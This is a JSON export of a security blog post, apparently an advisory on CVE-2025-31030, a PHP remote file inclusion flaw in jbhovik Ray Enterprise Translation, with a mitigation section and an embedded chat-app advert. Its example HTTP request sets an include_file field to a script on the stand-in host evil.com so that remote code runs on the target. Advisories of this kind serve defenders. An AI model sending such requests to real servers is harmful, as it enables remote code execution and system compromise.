{"id":86226,"date":"2026-01-07T11:16:32","date_gmt":"2026-01-07T11:16:32","guid":{"rendered":""},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-30T06:00:00","slug":"cve-2025-31030-high-risk-php-remote-file-inclusion-vulnerability-in-jbhovik-ray-enterprise-translation","status":"publish","type":"post","link":"https:\/\/www.ameeba.com\/blog\/cve-2025-31030-high-risk-php-remote-file-inclusion-vulnerability-in-jbhovik-ray-enterprise-translation\/","title":{"rendered":"<strong>CVE-2025-31030: High-Risk PHP Remote File Inclusion Vulnerability in jbhovik Ray Enterprise Translation<\/strong>"},"content":{"rendered":"<p><strong>Overview<\/strong><\/p>\n<p>The CVE-2025-31030 vulnerability is a critical flaw in the jbhovik Ray Enterprise Translation, a widely-used PHP-based platform. This issue stems from an improper control of filename for Include\/Require Statement in PHP Program (&#8216;PHP Remote File Inclusion&#8217;), potentially leading to a PHP Local File Inclusion. Due to the severity of this issue, it can result in system compromise or data leakage, posing a significant threat to any institution using affected versions of the software.<\/p>\n<p><strong>Vulnerability Summary<\/strong><\/p>\n<p>CVE ID: CVE-2025-31030<br \/>\nSeverity: High (CVSS: 7.5)<br \/>\nAttack Vector: Network<br \/>\nPrivileges Required: None<br \/>\nUser Interaction: None<br \/>\nImpact: System compromise and potential data leakage<\/p>\n<p><strong>Affected Products<\/strong><\/p><div id=\"ameeb-3256334622\" class=\"ameeb-content-2 ameeb-entity-placement\"><div style=\"border-left: 4px solid #555; padding-left: 20px; margin: 48px 0; font-family: Roboto, sans-serif; color: #ffffff; line-height: 1.6; max-width: 700px;\">\r\n  <h2 style=\"margin-top: 0; font-size: 20px; font-weight: 600; display: flex; align-items: center;\">\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\" style=\"display: inline-flex; align-items: center; margin-right: 8px;\">\r\n      <img decoding=\"async\" src=\"https:\/\/www.ameeba.com\/blog\/wp-content\/uploads\/2025\/10\/Best-App-icon-Ameeba.png\" alt=\"Ameeba Chat Icon\" style=\"width: 40px; height: 40px;\" \/>\r\n    <\/a>\r\n    A new way to communicate\r\n  <\/h2>\r\n\r\n  <p style=\"margin-bottom: 12px;\">\r\n    Ameeba Chat is built on encrypted identity, not personal profiles.\r\n  <\/p>\r\n\r\n  <p style=\"margin-bottom: 16px;\">\r\n    Message, call, share files, and coordinate with identities kept separate.\r\n  <\/p>\r\n\r\n  <ul style=\"list-style: none; padding-left: 0; margin-bottom: 20px;\">\r\n    <li>\u2022 Encrypted identity<\/li>\r\n    <li>\u2022 Ameeba Chat authenticates access<\/li>\r\n    <li>\u2022 Aliases and categories<\/li>\r\n    <li>\u2022 End-to-end encrypted chat, calls, and files<\/li>\r\n    <li>\u2022 Secure notes for sensitive information<\/li>\r\n  <\/ul>\r\n\r\n  <p style=\"font-style: italic; font-weight: 600; margin-bottom: 24px;\">\r\n    Private communication, rethought.\r\n  <\/p>\r\n\r\n  <div style=\"display: flex; flex-wrap: wrap; gap: 12px;\">\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\/download\" style=\"background-color: #ffffff; color: #000000; padding: 10px 20px; text-decoration: none; border-radius: 6px; font-weight: 500;\">Download Ameeba Chat<\/a>\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\" style=\"border: 1px solid #ffffff; color: #ffffff; padding: 10px 20px; text-decoration: none; border-radius: 6px; font-weight: 500;\">Learn More<\/a>\r\n  <\/div>\r\n<\/div>\r\n<\/div>\n<p>Product | Affected Versions<\/p>\n<p>jbhovik Ray Enterprise Translation | n\/a through 1.7.0<\/p>\n<p><strong>How the Exploit Works<\/strong><\/p>\n<p>The exploit takes advantage of the improper control of filename for Include\/Require Statement in the PHP program. An attacker can manipulate the PHP Remote File Inclusion to force the server to execute arbitrary PHP code from a remote server. This can lead to a PHP Local File Inclusion, enabling the attacker to load and execute local files on the server. This can lead to a full system compromise and potential data leakage.<\/p>\n<p><strong>Conceptual Example Code<\/strong><\/p><div id=\"ameeb-1571971253\" class=\"ameeb-content ameeb-entity-placement\"><div class=\"poptin-embedded\" data-id=\"f6b387694f681\"><\/div>\r\n\r\n\r\n\r\n\r\n\r\n<\/div>\n<p>Here is a conceptual example of an HTTP request exploiting this vulnerability:<\/p>\n<pre><code class=\"\" data-line=\"\">POST \/ray-enterprise-translation\/endpoint HTTP\/1.1\nHost: target.example.com\nContent-Type: application\/json\n{ &quot;include_file&quot;: &quot;http:\/\/evil.com\/malicious.php&quot; }<\/code><\/pre>\n<p>In this example, the malicious PHP file from a remote server (&#8220;evil.com&#8221;) is included and executed on the target server, exploiting the &#8216;PHP Remote File Inclusion&#8217; vulnerability.<\/p>\n<p><strong>Mitigation<\/strong><\/p>\n<p>Users affected by this vulnerability are advised to apply the vendor&#8217;s patch as soon as possible. If the patch cannot be applied immediately, the use of a Web Application Firewall (WAF) or an Intrusion Detection System (IDS) can serve as temporary mitigation. These tools can help detect and prevent attempts to exploit this vulnerability, thereby enhancing the security of the system.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Overview The CVE-2025-31030 vulnerability is a critical flaw in the jbhovik Ray Enterprise Translation, a widely-used PHP-based platform. This issue stems from an improper control of filename for Include\/Require Statement in PHP Program (&#8216;PHP Remote File Inclusion&#8217;), potentially leading to a PHP Local File Inclusion. Due to the severity of this issue, it can result [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"footnotes":""},"categories":[],"tags":[],"vendor":[],"product":[],"attack_vector":[],"asset_type":[],"severity":[],"exploit_status":[],"class_list":["post-86226","post","type-post","status-publish","format-standard","hentry"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/86226","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/comments?post=86226"}],"version-history":[{"count":0,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/86226\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/media?parent=86226"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/categories?post=86226"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/tags?post=86226"},{"taxonomy":"vendor","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/vendor?post=86226"},{"taxonomy":"product","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/product?post=86226"},{"taxonomy":"attack_vector","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/attack_vector?post=86226"},{"taxonomy":"asset_type","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/asset_type?post=86226"},{"taxonomy":"severity","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/severity?post=86226"},{"taxonomy":"exploit_status","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/exploit_status?post=86226"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}